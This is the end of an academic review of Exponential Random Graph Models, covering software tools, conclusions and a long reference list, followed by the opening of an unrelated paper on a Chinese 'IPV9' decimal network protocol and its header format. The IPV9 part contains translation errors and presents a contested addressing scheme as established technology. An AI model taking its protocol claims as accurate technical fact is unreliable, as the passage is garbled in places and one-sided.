of animal networks. In a novel work, Müller, Grund & Koskinen (2018) studied the social inequalities in Sweden by analyzing an immigrant movement flow network on both the micro and macro levels. Their network was a directed binary graph with Stockholm’s neighborhoods as the nodes and ties as the representative of the movement flow across neighborhoods. Only structural features (statistics) were used in ERGMs. How do networks respond to a sudden change? Which sort of disruptions is most influential in the network upcoming status? How the network will react to a change or what is the best reaction? These are all questions that can be summarized as ‘‘forecasting social network reaction to disruption.’’ In a recent article, Mellon & Evans (2018) reviewed state-of-the-art research articles concerning these topics in various fields. According to them and by mentioning one of their previous works (Mellon, Yoder & Evans, 2016), ERGMs can play a crucial role in this issue. In the mentioned work, they used ERGMs to examine the network formation mechanism before and after the intervention. According to their findings, networks tend to preserve these mechanisms following the disruptions. TOOLS AND LIBRARIES There are a number of useful tools and libraries that facilitate use of ERGMs in different domains. PNet and its extension for multilevel networks (MPnet) and bivariate analysis (XPnet) were introduced by Wang, Robins & Pattison (2006). It is a stand-alone software, it has both windows .NET and Java versions. Because of the Java version, it can be considered as a cross-platform application. Also, since it is not a library of some other languages and thanks to its user-friendly environment, it is the most suitable choice for people with less computer programming background. It is also a free software application and can easily be downloaded through its website (http://www.melnet.org.au/pnet/). Statnet (Handcock et al., 2003; Handcock et al., 2008) is an R language package which can implement most state-of-the-art ERGM methods and algorithms. It also has a variety of capabilities via other R libraries. For example, some visualization options are available through libraries such as dynamic network and rSoNIA. A wide range of network configurations has been implemented in this package. It has an active community, and it seems that it is the de facto standard library for ERGMs. Thanks to its open source and well- documented codebase, it can be used as a template for implementation of new methods. However, because it is a programming language library and not standalone software, it requires minimum knowledge of programming. Goodreau et al. (2008) have presented a detailed explanation for its installation and usage. There are also other extensions for the Statnet; for example, Caimo & Friel (2012) has incorporated the Bayesian ERGMs into the library. Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 21/30 https://peerj.com http://www.melnet.org.au/pnet/ http://dx.doi.org/10.7717/peerj-cs.269 CONCLUSIONS This study offered an explanation of Exponential Random Graph Models aka ERGMs. We also reviewed some state-of-the-art methods published after 2016. These articles either presented new methods for fitting the ERGMs parameters or studied the possibility of using new network configurations. Further, we did a comprehensive study of the research articles published by scientists of multiple disciplines which have leveraged the applications of ERGMs in their fields of interest. Multiple variation of the ERGM networks have been reviewed. We classified research articles in seven plus one (other applications) categories. These included research works in medical imaging, healthcare applications, economics and management, political science, missing data and link prediction, scientific collaboration, Wireless Networks Modelling, and other applications. Altogether, these studies provided valuable insight into the potential use of ERGMs in interdisciplinary research. We also presented a brief description of the ERGMs tools and libraries which can be used by scientists to conduct research like the research papers we presented. The objective of this study was to develop an understanding of the ERGMs methods and applications for those with limited knowledge about them. However, more in depth study for applications of ERGMs in each special area of study is still needed. These domain specific studies can do further analysis on the technical side of the ERGM modelling which was not a concern of our work. Some potential future directions for future research are: • There are many good papers investigated the applications of Exponential Random Graphs from social science research community. However, there is a lack of interest among engineering community in these methods. Investigating the possibilities of using ERGMs in networked data in various field of engineering studies is a research path should be considered in the future. Some examples are studies on computer network topology, internet measurement which this statistical tool might be used for prediction of missing links or for the purpose of data, etc. • Multilayer networks are now widely studied in different disciplines e.g., transport and economical networks. Despite some good works using state of the art ERGMs methods for multi-layer networks there is still a lack of interest in using statistical tools like ERGMs for them comparing to other methods. • The hype of deep learning (LeCun, Bengio & Hinton, 2015) has made many new possibilists for combining them with traditional methods to achieve better estimation. To the best of our knowledge no work has been done to this date trying to leverage graph based deep learning methods alongside ERGMs. • Despite the existence of comprehensive libraries for ERGMs like statnet, there is still no library for it written in Python. Since Python is the most used programming language in data science it is worthwhile to implement a powerful library for ERGMs modelling in Python. One possible way is to extend current widely used libraries like NetworkX (Hagberg, Swart & Chult, 2008) to include ERGMs in them. • To the best of our knowledge there is no comprehensive research on comparison of ERGMs with newly presented generative graph models like NetGAN (Bojchevski et al., 2018). Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 22/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.269 ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Saeid Ghafouri conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. • Seyed Hossein Khasteh analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Our paper is a review paper and there is no code or raw data associated with it. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.269#supplemental-information. REFERENCES Amati V, Lomi A, Mira A. 2018. Social network modeling. Annual Review of Statistics and Its Application 5:343–369 DOI 10.1146/annurev-statistics-031017-100746. An W, Ding Y. 2018. The landscape of causal inference: perspective from citation network analysis. The American Statistician 72:265–277 DOI 10.1080/00031305.2017.1360794. Anderson CJ, Wasserman S, Crouch B. 1999. A p* primer: logit models for social networks. Social Networks 21:37–66 DOI 10.1016/S0378-8733(98)00012-4. Baggio S, Luisier V, Vladescu C. 2017. Relationships between social networks and mental health: an exponential random graph model approach among Romanian adolescents. Swiss Journal of Psychology 76(1):5. Becker KR, Stojek MM, Clifton A, Miller JD. 2018. Disordered eating in college sorority women: a social network analysis of a subset of members from a single sorority chapter. Appetite. Bianchi F, Casnici N, Squazzoni F. 2018. Solidarity as a byproduct of professional collaboration: social support and trust in a coworking space. Social Networks 54:61–72 DOI 10.1016/j.socnet.2017.12.002. Block P, Koskinen J, Hollway J, Steglich C, Stadtfeld C. 2018. Change we can believe in: comparing longitudinal network models on consistency, interpretability and predictive power. Social Networks 52:180–191 DOI 10.1016/j.socnet.2017.08.001. Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 23/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.269#supplemental-information http://dx.doi.org/10.7717/peerj-cs.269#supplemental-information http://dx.doi.org/10.1146/annurev-statistics-031017-100746 http://dx.doi.org/10.1080/00031305.2017.1360794 http://dx.doi.org/10.1016/S0378-8733(98)00012-4 http://dx.doi.org/10.1016/j.socnet.2017.12.002 http://dx.doi.org/10.1016/j.socnet.2017.08.001 http://dx.doi.org/10.7717/peerj-cs.269 Bojchevski A, Shchur O, Zügner D, Günnemann S. 2018. NetGAN: generating Graphs via Random Walks. ArXiv preprint. arXiv:1803.00816. Bouranis L, Friel N, Maire F. 2017. Efficient Bayesian inference for exponential random graph models by correcting the pseudo-posterior distribution. Social Networks 50:98–108 DOI 10.1016/j.socnet.2017.03.013. Bouranis L, Friel N, Maire F. 2018. Bayesian model selection for exponential random graph models via adjusted pseudolikelihoods. Journal of Computational and Graphi- cal Statistics 1–13. Byshkin M, Stivala A, Mira A, Krause R, Robins G, Lomi A. 2016. Auxiliary param- eter MCMC for exponential random graph models. Journal of Statistical Physics 165:740–754 DOI 10.1007/s10955-016-1650-5. Caimo A, Friel N. 2011. Bayesian inference for exponential random graph models. Social Networks 33:41–55 DOI 10.1016/j.socnet.2010.09.004. Caimo A, Friel N. 2012. Bergm: Bayesian exponential random graphs in R. ArXiv preprint. arXiv:1201.2770. Caimo A, Friel N. 2014. Bergm: Bayesian exponential random graphs in R. Journal of Statistical Software 61:1–25. Caimo A, Pallotti F, Lomi A. 2017. Bayesian exponential random graph modelling of interhospital patient referral networks. Statistics in Medicine 36:2902–2920 DOI 10.1002/sim.7301. Campbell BW, Marrs FW, Böhmelt T, Fosdick BK, Cranmer SJ. 2019. Latent in- fluence networks in global environmental politics. PLOS ONE 14:e0213284 DOI 10.1371/journal.pone.0213284. Chatterjee S. 2016. An introduction to large deviations for random graphs. Bulletin of the American Mathematical Society 53:617–642 DOI 10.1090/bull/1539. Chatterjee S, Diaconis P. 2013. Estimating and understanding exponential random graph models. The Annals of Statistics 41:2428–2461 DOI 10.1214/13-AOS1155. Chen THY. 2019. Statistical inference for multilayer networks in political science. Political Science Research and Methods 1–18. Coleman JS. 1958. Relational analysis: the study of social organizations with survey methods. Human Organization 17:28–36 DOI 10.17730/humo.17.4.q5604m676260q8n7. De la Haye K, Embree J, Punkay M, Espelage DL, Tucker JS, Green Jr HD. 2017. Analytic strategies for longitudinal networks with missing data. Social Networks 50:17–25 DOI 10.1016/j.socnet.2017.02.001. Dellitalia J, Johnson MA, Vespa PM, Monti MM. 2018. Network analysis in disorders of consciousness: four problems and one proposed solution (Exponential Random Graph Models). Frontiers in Neurology 9:439–460 DOI 10.3389/fneur.2018.00439. Desmarais BA, Cranmer SJ. 2012. Statistical inference for valued-edge networks: the generalized exponential random graph model. PLOS ONE 7:e30136 DOI 10.1371/journal.pone.0030136. Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 24/30 https://peerj.com http://arXiv.org/abs/1803.00816 http://dx.doi.org/10.1016/j.socnet.2017.03.013 http://dx.doi.org/10.1007/s10955-016-1650-5 http://dx.doi.org/10.1016/j.socnet.2010.09.004 http://arXiv.org/abs/1201.2770 http://dx.doi.org/10.1002/sim.7301 http://dx.doi.org/10.1371/journal.pone.0213284 http://dx.doi.org/10.1090/bull/1539 http://dx.doi.org/10.1214/13-AOS1155 http://dx.doi.org/10.17730/humo.17.4.q5604m676260q8n7 http://dx.doi.org/10.1016/j.socnet.2017.02.001 http://dx.doi.org/10.3389/fneur.2018.00439 http://dx.doi.org/10.1371/journal.pone.0030136 http://dx.doi.org/10.7717/peerj-cs.269 Duxbury SW, Haynie DL. 2018. Building them up, breaking them down: topology, vendor selection patterns, and a digital drug market’s robustness to disruption. Social Networks 52:238–250 DOI 10.1016/j.socnet.2017.09.002. Erdös P, Rényi A. 1959. On random graphs I. Publicationes Mathematicae (Debrecen) 6:290–297. Fagan J, Eddens KS, Dolly J, Vanderford NL, Weiss H, Levens JS. Research Collabora- tion, xx. 2018. Assessing through co-authorship network analysis. Journal of Research Administration 49:76–99. Fienberg SE. 2010. Introduction to papers on the modeling and analysis of network data. The Annals of Applied Statistics 4:1–4. Frank O. 1981. A survey of statistical methods for graph analysis. Sociological Methodol- ogy 12:110–155 DOI 10.2307/270740. Frank O, Strauss D. 1986. Markov graphs. Journal of the American Statistical Association 81:832–842 DOI 10.1080/01621459.1986.10478342. Gallemore C, Jespersen K. 2016. Transnational markets for sustainable development governance: the case of REDD+. World Development 86:79–94 DOI 10.1016/j.worlddev.2016.06.009. Geyer CJ, Thompson EA. 1992. Constrained Monte Carlo maximum likelihood for dependent data. Journal of the Royal Statistical Society. Series B (Methodological) 54:657–699. Goldenberg A, Zheng AX, Fienberg SE, Airoldi EM. 2010. A survey of statistical network models. Foundations and Trends R©in Machine Learning 2:129–233. Goodman LA. 1961. Snowball sampling. The Annals of Mathematical Statistics 32:148–170. Goodreau SM. 2007. Advances in exponential random graph (p*) models applied to a large social network. Social Networks 29:231–248 DOI 10.1016/j.socnet.2006.08.001. Goodreau SM, Handcock MS, Hunter DR, Butts CT, Morris M. 2008. A statnet tutorial. Journal of Statistical Software 24(9):1. Gupta B, Iyer SK, Manjunath D. 2008. Topological properties of the one dimensional exponential random geometric graph. Random Structures & Algorithms 32:181–204 DOI 10.1002/rsa.20174. Hagberg A, Swart P, Chult DS. 2008. Exploring network structure, dynamics, and function using NetworkX. Los Alamos: Los Alamos National Lab.(LANL). Hamilton M, Lubell M. 2018. Collaborative governance of climate change adapta- tion across spatial and institutional scales. Policy Studies Journal 46:222–247 DOI 10.1111/psj.12224. Handcock MS, Hunter DR, Butts CT, Goodreau SM, Morris M. 2003. Statnet: software tools for the statistical modeling of network data. Seattle. Available at http:// statnetproject.org. Handcock MS, Hunter DR, Butts CT, Goodreau SM, Morris M. 2008. statnet: software tools for the representation, visualization, analysis and simulation of network data. Journal of Statistical Software 24:1548. Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 25/30 https://peerj.com http://dx.doi.org/10.1016/j.socnet.2017.09.002 http://dx.doi.org/10.2307/270740 http://dx.doi.org/10.1080/01621459.1986.10478342 http://dx.doi.org/10.1016/j.worlddev.2016.06.009 http://dx.doi.org/10.1016/j.socnet.2006.08.001 http://dx.doi.org/10.1002/rsa.20174 http://dx.doi.org/10.1111/psj.12224 http://statnetproject.org http://statnetproject.org http://dx.doi.org/10.7717/peerj-cs.269 Handcock MS, Jones JH. 2004. Likelihood-based inference for stochastic mod- els of sexual network formation. TheoretIcal Population Biology 65:413–422 DOI 10.1016/j.tpb.2003.09.006. Hanneke S, Fu W, Xing EP. 2010. Discrete temporal models of social networks. Electronic Journal of Statistics 4:585–605 DOI 10.1214/09-EJS548. Hellmann JK, Hamilton IM. 2018. Intragroup social dynamics vary with the presence of neighbors in a cooperatively breeding fish. Current Zoology 65(1):21–31. Holland PW, Leinhardt S. 1977. A dynamic model for social networks. Journal of Mathematical Sociology 5:5–20 DOI 10.1080/0022250X.1977.9989862. Hunter DR. 2007. Curved exponential family models for social networks. Social Networks 29:216–230 DOI 10.1016/j.socnet.2006.08.005. Hunter DR, Handcock MS, Butts CT, Goodreau SM, Morris M. 2008. ergm: A package to fit, simulate and diagnose exponential-family models for networks. Journal of Statistical Software 24(3):nihpa54860. Iyer SK, Manjunath D. 2006. Topological properties of random wireless networks. Sadhana 31:117–139 DOI 10.1007/BF02719777. Karamchandani N, Manjunath D, Yogeshwaran D, Iyer SK. 2006. Evolving random ge- ometric graph models for mobile wireless networks. In: 4th international symposium on modeling and optimization in mobile, ad hoc and wireless networks. 1–7. Kenniche H, Ravelomananana V. 2010. Random geometric graphs as model of wireless sensor networks. In: 2010 The 2nd international conference on computer and automa- tion engineering (ICCAE). 103–107. Koskinen JH, Robins GL, Pattison PE. 2010. Analysing exponential random graph (p-star) models with missing data using Bayesian data augmentation. Statistical Methodology 7:366–384 DOI 10.1016/j.stamet.2009.09.007. Koskinen JH, Robins GL, Wang P, Pattison PE. 2013. Bayesian analysis for partially ob- served network data, missing ties, attributes and actors. Social Networks 35:514–527 DOI 10.1016/j.socnet.2013.07.003. Koskinen JH, Snijders TAB. 2007. Bayesian inference for dynamic social network data. Journal of Statistical Planning and Inference 137:3930–3938 DOI 10.1016/j.jspi.2007.04.011. Krause RW, Caimo A. 2019. Missing data augmentation for Bayesian exponential random multi-graph models. In: International workshop on complex networks. 63–72. Krause RW, Huisman M, Steglich C, Sniiders TAB. 2018. Missing network data a comparison of different imputation methods. In: 2018. IEEE/ACM international conference on advances in social networks analysis and mining (ASONAM). 159–163. Krivitsky PN. 2012. Exponential-family random graph models for valued networks. Electronic Journal of Statistics 6:1100–1128 DOI 10.1214/12-EJS696. Krivitsky PN, Handcock MS. 2014. A separable model for dynamic networks. Jour- nal of the Royal Statistical Society: Series B (Statistical Methodology) 76:29–46 DOI 10.1111/rssb.12014. LeCun Y, Bengio Y, Hinton G. 2015. Deep learning. Nature 521:436–444. Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 26/30 https://peerj.com http://dx.doi.org/10.1016/j.tpb.2003.09.006 http://dx.doi.org/10.1214/09-EJS548 http://dx.doi.org/10.1080/0022250X.1977.9989862 http://dx.doi.org/10.1016/j.socnet.2006.08.005 http://dx.doi.org/10.1007/BF02719777 http://dx.doi.org/10.1016/j.stamet.2009.09.007 http://dx.doi.org/10.1016/j.socnet.2013.07.003 http://dx.doi.org/10.1016/j.jspi.2007.04.011 http://dx.doi.org/10.1214/12-EJS696 http://dx.doi.org/10.1111/rssb.12014 http://dx.doi.org/10.7717/peerj-cs.269 Leifeld P, Cranmer SJ, Desmarais BA. 2017. Temporal exponential random graph models with btergm: estimation and bootstrap confidence intervals. Journal of Statistical Software 83(6):1–36. Leifeld P, Fisher DR. 2017. Membership nominations in international scientific assess- ments. Nature Climate Change 7:730–735. Leifeld P. 2018. Polarization in the social sciences: assortative mixing in social science collaboration networks is resilient to interventions. Physica A: Statistical Mechanics and its Applications 507:510–523 DOI 10.1016/j.physa.2018.05.109. Li W, Bradshaw AE, Clary CB, Cranmer SJ. 2017. A three-degree horizon of peace in the military alliance network. Science Advances 3:e160189. Lozano S, Gutiérrez E. 2018. A complex network analysis of global tourism flows. International Journal of Tourism Research 20(5):588–604. Lusher D, Koskinen J, Robins G. 2012. Exponential random graph models for social networks: theory, methods, and applications. New York: Cambridge University Press. Marrs FW, Campbell BW, Fosdick BK, Cranmer SJ, Böhmelt T. 2018. Inferring influence networks from longitudinal bipartite relational data. ArXiv preprint. arXiv:1809.03439. Mellon J, Evans D. 2018. Forecasting social network reaction to disruption: current practices and new directions. Elsevier. Mellon J, Yoder J, Evans D. 2016. Undermining and strengthening social networks through network modification. Scientific Reports 6:34613 DOI 10.1038/srep34613. Metropolis N, Rosenbluth AW, Rosenbluth MN, Teller AH, Teller E. 1953. Equation of state calculations by fast computing machines. The Journal of Chemical Physics 21:1087–1092 DOI 10.1063/1.1699114. Morris M, Handcock MS, Hunter DR. 2008. Specification of exponential-family random graph models: terms and computational aspects. Journal of Statistical Software 24(4):1548. Müller TS, Grund TU, Koskinen JH. 2018. Residential segregation and ‘Ethnic Flight’vs.‘Ethnic Avoidance’in Sweden. European Sociological Review 34:268–285 DOI 10.1093/esr/jcy010. Osei A. 2018. Like father, like son? Power and influence across two Gnassingbé presiden- cies in Togo. Democratization 25:1–21. Pan Z. 2018. Varieties of intergovernmental organization memberships and structural effects in the world trade network. Advances in Complex Systems 21:1850001. Pattison P, Wasserman S. 1999. Logit models and logistic regressions for social net- works: II. Multivariate relations. British Journal of Mathematical and Statistical Psychology 52:169–193 DOI 10.1348/000711099159053. Penrose M. 2003. Random geometric graphs. Oxford: Oxford University Press. RA Fisher MA. 1922. On the mathematical foundations of theoretical statistics. Philo- sophical Transactions of the Royal Society of London Series A, Containing Papers of a Mathematical or Physical Character 222:309–368 DOI 10.1098/rsta.1922.0009. Raghavendra CS, Sivalingam KM, Znati T. 2006. Wireless sensor networks. Springer Netherlands: Springer. Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 27/30 https://peerj.com http://dx.doi.org/10.1016/j.physa.2018.05.109 http://arXiv.org/abs/1809.03439 http://dx.doi.org/10.1038/srep34613 http://dx.doi.org/10.1063/1.1699114 http://dx.doi.org/10.1093/esr/jcy010 http://dx.doi.org/10.1348/000711099159053 http://dx.doi.org/10.1098/rsta.1922.0009 http://dx.doi.org/10.7717/peerj-cs.269 Robins G, Pattison P, Kalish Y, Lusher D. 2007a. An introduction to exponential random graph (p*) models for social networks. Social Networks 29:173–191 DOI 10.1016/j.socnet.2006.08.002. Robins G, Pattison P, Wasserman S. 1999. Logit models and logistic regres- sions for social networks: III. Valued relations. Psychometrika 64:371–394 DOI 10.1007/BF02294302. Robins G, Snijders T, Wang P, Handcock M, Pattison P. 2007b. Recent developments in exponential random graph (p*) models for social networks. Social Networks 29:192–215 DOI 10.1016/j.socnet.2006.08.003. Schmid CS, Desmarais BA. 2017. Exponential random graph models with big networks: maximum pseudolikelihood estimation and the parametric bootstrap. In: Big Data (Big Data), 2017 IEEE International Conference on. IEEE, 116–121. Scott TA, Thomas CW. 2017. Winners and losers in the ecology of games: network po- sition, connectivity, and the benefits of collaborative governance regimes. Journal of Public Administration Research and Theory 27:647–660 DOI 10.1093/jopart/mux009. Shang Y. 2009. Exponential random geometric graph process models for mobile wireless networks. In: 2009 International conference on cyber-enabled distributed computing and knowledge discovery. 6–61. Silk MJ, Croft DP, Delahay RJ, Hodgson DJ, Weber N, Boots M, McDonald RA. 2017. The application of statistical network models in disease research. Methods in Ecology and Evolution 8:1026–1041 DOI 10.1111/2041-210X.12770. Silk MJ, Fisher DN. 2017. Understanding animal social structure: exponential random graph models in animal behaviour research. Animal Behaviour 132:137–146 DOI 10.1016/j.anbehav.2017.08.005. Silk MJ, Weber NL, Steward LC, Hodgson DJ, Boots M, Croft DP, Delahay RJ, McDonald RA. 2018. Contact networks structured by sex underpin sex-specific epidemiology of infection. Ecology Letters 21:309–318 DOI 10.1111/ele.12898. Simpson SL, Hayasaka S, Laurienti PJ. 2011. Exponential random graph modeling for complex brain networks. PLOS ONE 6:e20039 DOI 10.1371/journal.pone.0020039. Simpson SL, Moussa MN, Laurienti PJ. 2012. An exponential random graph modeling approach to creating group-based representative whole-brain connectivity networks. NeuroImage 60:1117–1126 DOI 10.1016/j.neuroimage.2012.01.071. Sinke MRT, Dijkhuizen RM, Caimo A, Stam CJ, Otte WM. 2016. Bayesian exponential random graph modeling of whole-brain structural networks across lifespan. NeuroImage 135:79–91 DOI 10.1016/j.neuroimage.2016.04.066. Smith JA. 2012. Macrostructure from microstructure: generating whole systems from ego networks. Sociological Methodology 42:155–205 DOI 10.1177/0081175012455628. Snijders TAB. 1996. Stochastic actor-oriented models for network change. Journal of Mathematical Sociology 21:149–172 DOI 10.1080/0022250X.1996.9990178. Snijders TAB. 2002. Markov chain Monte Carlo estimation of exponential random graph models. Journal of Social Structure 3:1–40. Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 28/30 https://peerj.com http://dx.doi.org/10.1016/j.socnet.2006.08.002 http://dx.doi.org/10.1007/BF02294302 http://dx.doi.org/10.1016/j.socnet.2006.08.003 http://dx.doi.org/10.1093/jopart/mux009 http://dx.doi.org/10.1111/2041-210X.12770 http://dx.doi.org/10.1016/j.anbehav.2017.08.005 http://dx.doi.org/10.1111/ele.12898 http://dx.doi.org/10.1371/journal.pone.0020039 http://dx.doi.org/10.1016/j.neuroimage.2012.01.071 http://dx.doi.org/10.1016/j.neuroimage.2016.04.066 http://dx.doi.org/10.1177/0081175012455628 http://dx.doi.org/10.1080/0022250X.1996.9990178 http://dx.doi.org/10.7717/peerj-cs.269 Snijders TAB, Pattison PE, Robins GL, Handcock MS. 2006. New specifications for exponential random graph models. Sociological Methodology 36:99–153 DOI 10.1111/j.1467-9531.2006.00176.x. Solo V, Poline J-B, Lindquist MA, Simpson SL, Bowman FD, Chung MK, Cassidy B. 2018. Connectivity in fMRI: blind spots and breakthroughs. IEEE Transactions on Medical Imaging 37:1537–1550 DOI 10.1109/TMI.2018.2831261. Song H, Cho J, Benefield GA. 2018. The dynamics of message selection in online political discussion forums: self-segregation or diverse exposure? Communication Research 47:0093650218790144. Stauffer J, Pedraza Martinez A, Yan LL, Van Wassenhove LN. 2018. Asset supply networks in humanitarian operations: a combined empirical-simulation approach. Journal of Operations Management. Stivala AD, Koskinen JH, Rolls DA, Wang P, Robins GL. 2016. Snowball sampling for estimating exponential random graph models for large networks. Social Networks 47:167–188 DOI 10.1016/j.socnet.2015.11.003. Thiemichen S, Kauermann G. 2017. Stable exponential random graph models with non-parametric components for large dense networks. Social Networks 49:67–80 DOI 10.1016/j.socnet.2016.12.002. Thurner PW, Schmid CS, Cranmer SJ, Kauermann G. 2019. Network interdependencies and the evolution of the international arms trade. Journal of Conflict Resolution 63:1736–1764 DOI 10.1177/0022002718801965. Ulibarri N, Scott TA. 2016. Linking network structure to collaborative governance. Journal of Public Administration Research and Theory 27:163–181. Van der Pol J. 2018. Introduction to network modeling using exponential random graph models (ergm): theory and an application using R-project. Computational Economics 54:1–31. Wang P, Robins G, Pattison P, Lazega E. 2013. Exponential random graph models for multilevel networks. Social Networks 35:96–115 DOI 10.1016/j.socnet.2013.01.004. Wang P, Robins G, Pattison P. 2006. PNet: a program for the simulation and estimation of exponential random graph models. Melbourne: University of Melbourne. Williams NL, Hristov D. 2018. An examination of DMO network identity us- ing exponential random graph models. Tourism Management 68:177–186 DOI 10.1016/j.tourman.2018.03.014. Wilson JD, Denny MJ, Bhamidi S, Cranmer SJ, Desmarais BA. 2017. Stochastic weighted graphs: flexible model specification and simulation. Social Networks 49:37–47 DOI 10.1016/j.socnet.2016.11.002. Windzio M. 2018. The network of global migration 1990–2013: using ERGMs to test theories of migration between countries. Social Networks 53:20–29 DOI 10.1016/j.socnet.2017.08.006. You J, Ying R, Ren X, Hamilton W, Leskovec J. 2018. GraphRNN: generating realistic graphs with deep auto-regressive models. In: International conference on machine learning. 5694–5703. Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 29/30 https://peerj.com http://dx.doi.org/10.1111/j.1467-9531.2006.00176.x http://dx.doi.org/10.1109/TMI.2018.2831261 http://dx.doi.org/10.1016/j.socnet.2015.11.003 http://dx.doi.org/10.1016/j.socnet.2016.12.002 http://dx.doi.org/10.1177/0022002718801965 http://dx.doi.org/10.1016/j.socnet.2013.01.004 http://dx.doi.org/10.1016/j.tourman.2018.03.014 http://dx.doi.org/10.1016/j.socnet.2016.11.002 http://dx.doi.org/10.1016/j.socnet.2017.08.006 http://dx.doi.org/10.7717/peerj-cs.269 Zhang C, Bu Y, Ding Y, Xu J. 2018a. Understanding scientific collaboration: homophily, transitivity, and preferential attachment. Journal of the Association for Information Science and Technology 69:72–86 DOI 10.1002/asi.23916. Zhang C, Zhai BY, Wu M. 2013. Link prediction of community in microblog based on exponential random graph model. In: Wireless personal multimedia communications (WPMC), 2013 16th international symposium on. IEEE, 1–6. Zhang S, De La Haye K, Ji M, An R. 2018b. Applications of social network analysis to obesity: a systematic review. Obesity Reviews 19:976–988 DOI 10.1111/obr.12684. Zhang Y, Zhang H, Sun W, Pan C. 2014. Connectivity analysis for vehicular ad hoc network based on the exponential random geometric graphs. 993–998. Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 30/30 https://peerj.com http://dx.doi.org/10.1002/asi.23916 http://dx.doi.org/10.1111/obr.12684 http://dx.doi.org/10.7717/peerj-cs.269 work_hzrljsgczfffnf4dhbxxmv4zqi ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 DOI: 10.21307/ijanmc-2020-035 34 Discussion on Decimal Network Based on IPV9 Hu Shun Guilin University of Electronic Technology Xu Dongmei, Gao Lin China Institute of Electronic Technology Standardization Abstract—This paper introduces the core technology of decimal network digital domain name and IPV9 protocol family, and analyzes the technical characteristics of decimal network. Three kinds of common network transition techniques are listed, and various problems of decimal network application are discussed. Keywords-Decimal Network; Digital Domain Names; IPV9 I. INTRODUCTION TCP/IP network architecture and Protocol standards in recent years, computer network research and application of hot technology. At present, the widely used IP protocol is IPv4, based on which the Internet has become the largest computer network system in the world. However, with the rapid development of economic globalization and modern communication technology and network, the scale of computer network is expanding rapidly, and IPv4 protocol starts to expose various problems. Such as: IP address resources, address allocation efficiency is low, no consideration of confidential transmission. Facts show that IPv4 cannot meet the requirements of future Internet development. In this context, countries around the world have stepped up the work of the next generation of Internet protocols. IPv6 has been selected as an international standard by the Internet Engineering Task Force (IETF), while IPV9 proposed in 1992 was abandoned by the ETF due to its large address. Later, with the introduction of digital domain name system (DDNS), gradually developed into a 256-bit address IPV9 decimal network with China's independent intellectual property rights. II. DIGITAL DOMAIN NAME TECHNOLOGY The so-called digital domain name, refers to the Arabic numerals (0~9) as the Internet intelligent terminal domain name. The coding of digital domain name refers to the telephone coding rules. It adopts a hierarchical structure according to different regions and consists of root, country/region, and city and user code from top to bottom. Digital domain names provide users with an alternative to English domain names. At the same time, they have the following characteristics: ● Use of class telephone Numbers to facilitate domain name management and division; ● Make it easier and faster to browse the Internet on smart terminals in the future; ● Provides conditions for the realization of network end-to-end communication in the future; ● Number resources can be integrated to facilitate the integration of the three networks. Decimal network introduced the digital domain name system, and can be compatible with English domain name, Chinese domain name system. Through International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 35 the DNS of the domain name server, the digital domain name entered by the user is converted into the corresponding IP address to achieve the purpose of accessing the host. Currently, DDNS maps digital domain names to dynamic IP addresses by installing a small program on the client side. When the user dial-up Internet access, the user will be dynamic IP address and user's digital domain name information notification server, the server will be the user's digital domain name and dynamic IP address registered in the DDNS resolution system, and then began to provide digital domain name resolution services. When the user is offline, the user's digital domain name information is removed from the DDNS resolution system. At present, digital domain name system and IPV9 protocol has been recognized by some countries and regions. China has developed some IPV9 related network equipment and systems, solved the problem of interconnection between IPv4 network and IPV9 network, and realized the independent function of domain name resolution, domain name allocation, IP address allocation and MAC address allocation. After several years of trial operation, the experimental system established in Jinshan County, Changning District and Fujian province has been successfully tested in five small projects. The Shanghai experimental area is connected to IPv4 networks in Beijing and Hangzhou by tunnel. In addition, various applications based on THE IPV9 decimal network have been developed or are being developed. III. IPV9 PROTOCOL FAMILY IPV9 protocol family is a decimal network base protocol, including IPV9 header protocol, address protocol and transition protocol. A. IPV9 header Protocol IPV9 packet header format and field meaning are specified, including basic header and extended header. 1) Basic headers The basic header format specified in the IPV9 header protocol is shown in Table 1. TABLE I. IPV9 HEADER FORMAT version category Flow label Payload length Under one head Hop limit Source address The destination address Version: The length is 4 bits, indicating the protocol version number. Category: Length 8 bits, 0 to 15 as priority values. The priority classes 0 through 7 are used to specify communication Settings and are used by packet senders to control traffic. 8 to 15 is used to specify traffic that will not fall back in the event of congestion. 16 and 17 assign audio and video, called absolute values, to ensure uninterrupted transmission of audio and video. Others are reserved values. ● Stream label: A length of 20 bits, used to identify packets belonging to the same traffic. ● Net charge length: The length is 16 bits, indicating the number of bytes of the packet behind the IPV9 header. ● Next header: The length is 8 bits, which indicates the protocol type in the header field that follows the IPV9 header. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 36 ● Jump limit: The length is 8 bits, indicating the maximum number of times the packet can be forwarded by the node. ● Source address: The length is 256bit, representing the sender address. ● Destination address: The length is 256bit, representing the recipient address. 2) Extended headers Between the packet IPV9 header and the high-level protocol header, there may be specialized headers, called extended headers, to represent optional Internet layer information. The number of extended headers is small, and each is identified by a different next header value. The IPV9 packet can come with no or multiple extended headers, which need to be defined by the next header field in the previous header. The extended header of IPV9 protocol includes six types: segment selection, route selection, segmentation, destination options, identification and encapsulation of security payloads. 